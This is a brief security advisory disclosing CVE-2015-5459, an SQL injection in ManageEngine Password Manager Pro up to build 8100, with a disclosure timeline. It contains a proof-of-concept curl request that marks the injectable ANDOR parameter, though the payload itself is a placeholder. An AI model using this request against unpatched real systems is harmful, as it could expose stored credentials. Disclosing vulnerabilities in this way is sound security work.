ManageEngine Password Manager Pro <= 8.1 (build 8100) - SQL Injection vulnerability
CVE: CVE-2015-5459
CVSS v3: 9.9
AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Description: An authenticated user (even the guest user) is able to execute arbitrary SQL code using a forged request to SQLAdvancedALSearchResult.cc. The SQL query is built manually and is not escaped properly in the AdvanceSearch.class of AdventNetPassTrix.jar.
The problem is with escaping the operator when more than one condition is specified in the advanced search.
PoC:
$ curl 'https://localhost:7272/STATE_ID/1425543888647/SQLAdvancedALSearchResult.cc?ANDOR=***HERE_INJECT***&condition_1=Ptrx_Resource@RESOURCENAME&operator_1=CONTAINS&value_1=asd&condition_2=Ptrx_Resource@RESOURCENAME&operator_2=CONTAINS&value_2=asd2&FLAG=TRUE&COUNT=2&USERID=***USERID***&ADVSEARCH=true&SUBREQUEST=XMLHTTP'
Timeline:
- 30.06.2015 - vendor notified
- 15.07.2015 - vendor fixed the vulnerability in version 8.1 (build 8101)
References: I wrote an article about “zero-knowledge” secret management systems to compare different existing password managers and give guidance on how to choose a really secure password management software:
Adamczyk Błażej. Secure and convenient secret management in distributed computer systems. WSEAS Transactions on Computers, vol. 15, 2016, pp. 327-333.
tags: ManageEngine Password Manager Plus CVE CVE-2015-5459